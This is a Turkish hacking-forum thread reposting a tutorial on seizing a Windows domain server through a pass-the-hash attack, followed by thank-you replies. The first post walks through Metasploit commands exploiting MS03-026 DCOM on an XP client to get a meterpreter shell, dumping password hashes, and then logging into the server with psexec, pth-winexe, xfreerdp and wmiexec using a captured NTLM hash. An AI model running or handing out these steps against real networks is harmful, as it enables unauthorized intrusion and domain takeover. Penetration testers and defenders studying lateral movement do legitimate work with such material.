İPUCU

Yayınlar Siber güvenlik ile alakalı dergi ve kitapların, telif haklarını göz önünde bulundurularak paylaşım ve duyurularının yapılması.

Seçenekler

## Pass The Hass Saldırısı ile Domain Ele Geçirme ##

21-11-2017 12:51
#1
MwTugi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
4
Mesajlar:
4.886
Teşekkür (Etti):
334
Teşekkür (Aldı):
1617
Konular:
376
Ticaret:
(0) %
Pass the Hash Saldırısı ile Domain'i Ele Geçirme

Bir networkte birden fazla client bulunduğunda domain server kurulur. Bu server üzerinde gerekli politikalar oluşturularak kullanıcı oluşturulur. Daha sonra client’lar bilgisayarlarını açmak istediklerinde active directory’deki credential bilgileri ile bilgisayarlarını açarlar.

Biz burada client üzerinde bulunan parola hash’lerini alarak domain server'ı ele geçireceğiz. Kullanıcı hem client’ta hem de server üzerinde çalışabilen bir kullanıcı olmalıdır.




Client Windows XP SP1 çalışan bir cihaz ve serverda Windows Server 2008 r2 işletim sistemlerine sahiptirler. Client active directory’yi kullanarak login olmaktadır. Xp üzerinde “MS03-026 dcom” açıklığı bulunmaktadır. Bu açıklık yardımıyla parola hashlerini çekeceğiz.
Kod:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST 192.168.2.133
RHOST => 192.168.2.133
msf exploit(ms03_026_dcom) > set RPORT 135
RPORT => 135
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > run



"run" denilip meterpreter shell açıldıktan sonra ram üzerinde bilgileri çekmemiz gerekmektedir. Meterpreterda "hashdump" yazdığımızda, SAM dosyasındaki bilgileri vermektedir. Bu bizim için yeterli olmayacaktır. Bundan dolayı mimikatz aracını kullanarak aktif olan kullanıcıyıda görüntüleyebileceğiz.

Saldıracağımız kullanıcı "BTRISKLOCAL administrator" olacaktır. Bu kullanıcı hem clientta(XP de), hem de server(Windows Server 2008) de login olabilen bir kullanıcıdır. Bu kullanıcı ile sunucuyu ele geçireceğiz.

Doğru domain bilgilerini öğrenebilmemiz için nmap aracını kullanabilirsiniz.
[/COLOR]

Kod:
nmap -p 445 --script smb-os-discovery 192.168.2.5
[IMG]
https://3.bp.blogspot.com/-Nd72Iw1qtlE/WKGwXicvbaI/AAAAAAAAA7s/qnV2zDYLEMgdZ-wAnzUH45K0J4kfwYr8wCPcB/s1600/Pass%2Bthe%2BHash%2BSald%25C4%25B1r%25C4%25B1s%25C 4%25B1%2B%25C4%25B0le%2BDomain%2BServere%2BDahil%2 BOlma-3.jpg[/IMG]

use exploit/windows/smb/psexec modulunu kullanarak servera login olunabilmektedir.
Kod:
msf >  use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf >  use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator 
msf exploit(psexec) > set SMBPass f26fb3ae03e93ab9c81667e9d738c5d9:47bf8039a8506cd67c524a03ff84ba4e
SMBPass => f26fb3ae03e93ab9c81667e9d738c5d9:47bf8039a8506cd67c524a03ff84ba4e
msf exploit(psexec) > set SMBDomain btrisklocal
SMBDomain => btrisklocal
msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.184.131
LHOST => 192.168.184.131
msf exploit(psexec) > run
Gerekli bilgileri girildiğinden emin olun.



Show options dediğimizde ayarlar asadaki şekilde olacaktır.



Run diyerek giriş yapıyoruz



****sploit kullanmadan da bu işlemleri yapabilirsiniz. Bunun içinde pth-winexe, freerdp-x11, wmiexec.exe(Windowsda) vb. araçlar kullanılabilir. Bu araçlar da aynı mantıkla çalışmaktadır.

Kod:
#pth-winece Kullanımı
pth-winexe -U DOMAIN/username%hash //IP cmd.exe
pth-winexe -U btrisklocal/administrator%f26fb3ae03e93ab9c81667e9d738c5d9:47bf8039a8506cd67c524a03ff84ba4e //192.168.2.5 cmd.exe

#freerdp-x11 Kullanımı
xfreerdp /u:username /d:DOMAIN /ptn:hash /v:IP

#Windowsda kullanabileceğiniz wmiexec
.\wmiexec.exe -hashes HASH username@IP
Bulduğunuz hash'i decrypter araçları ile çözerek elde edilen parola ile başka sistemlere authentication uygulanabilir. Belki daha yetkili sistemlere giriş yapmaya izin verebilir


Alıntıdır
Kaynak; BTRiskBlog Pentest, ISO27001 ve BT Denetimi Hakkında Herşey
Gerçekten yararlı bilgiler paylaşılan ve takip ettiğim bir blog tavsiye ederim
Kullanıcı İmzası
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
Konu MwTugi tarafından (22-11-2017 17:20 Saat 17:20 ) değiştirilmiştir.

21-11-2017 12:58
#2
iscorpix - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Mesajlar:
4.403
Teşekkür (Etti):
840
Teşekkür (Aldı):
1182
Konular:
538
Ticaret:
(0) %
Emeğinize sağlık komutanım
21-11-2017 15:56
#3
MwTugi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
4
Mesajlar:
4.886
Teşekkür (Etti):
334
Teşekkür (Aldı):
1617
Konular:
376
Ticaret:
(0) %
Alıntı:
iscorpix´isimli üyeden Alıntı Mesajı göster
Emeğinize sağlık komutanım
Eyvallah
Kullanıcı İmzası
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
21-11-2017 16:23
#4
Ultra723 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2013
Nereden:
sitemap.xml
Yaş:
9
Mesajlar:
2.715
Teşekkür (Etti):
250
Teşekkür (Aldı):
503
Konular:
555
Ticaret:
(0) %
Bu guzel bilgi paylasimi icin tesekkurler
Kullanıcı İmzası
к. αтαтüяк

---> “Para ya da mal çaldığınızda birileri onun kaybolduğunu anlarlar. Bilgi çaldığınızda çoğu zaman bunu kimse fark etmez, çünkü bilgi hâlâ ellerindedir.”


- Kevin Mitnick


A8Yxqrk=+K+5
22-11-2017 17:20
#5
MwTugi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
4
Mesajlar:
4.886
Teşekkür (Etti):
334
Teşekkür (Aldı):
1617
Konular:
376
Ticaret:
(0) %
Alıntı:
Ultra723´isimli üyeden Alıntı Mesajı göster
Bu guzel bilgi paylasimi icin tesekkurler
Rica Ederim (:
Kullanıcı İmzası
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
22-11-2017 17:21
#6
Üyelik tarihi:
01/2016
Mesajlar:
1.439
Teşekkür (Etti):
105
Teşekkür (Aldı):
155
Konular:
81
Ticaret:
(0) %
Eline sağlık .
Kullanıcı İmzası

Turkhackteam.org / JonnieBrofer

© \\1923// JonnieBrofer ALL RIGHTS RESERVED
█║▌│█│║▌║█║▌│█│║
MUSTAFA KEMAL ATATÜRK
NE MUTLU TÜRK'ÜM DİYENE
█║▌│█│║▌║█║▌│█│║
23-11-2017 18:06
#7
MwTugi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
4
Mesajlar:
4.886
Teşekkür (Etti):
334
Teşekkür (Aldı):
1617
Konular:
376
Ticaret:
(0) %
Alıntı:
JonnieBrofer´isimli üyeden Alıntı Mesajı göster
Eline sağlık .
Eyvallah
Kullanıcı İmzası
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
23-11-2017 18:16
#8
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.280
Teşekkür (Etti):
512
Teşekkür (Aldı):
1280
Konular:
315
Ticaret:
(0) %
Ellerine sağlık.
23-11-2017 18:36
#9
King Kong - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.399
Teşekkür (Etti):
158
Teşekkür (Aldı):
424
Konular:
153
Ticaret:
(0) %
Ellerine Sağlık Süper Konu Bilmediğim Birşey Ve Detaylı Anlatım Efsane...
24-11-2017 22:35
#10
LifeHacker - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
853
Teşekkür (Etti):
133
Teşekkür (Aldı):
117
Konular:
117
Ticaret:
(0) %
Gene döktürmüşsün (:
Kullanıcı İmzası
"Bir millet eğitim ordusuna sahip olmadıkça, savaş meydanlarında ne kadar parlak zaferler elde ederse etsin, o zaferlerin kalıcı sonuçlar vermesi ancak eğitim ordusuyla mümkündür."

M.KEMAL ATATÜRK

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı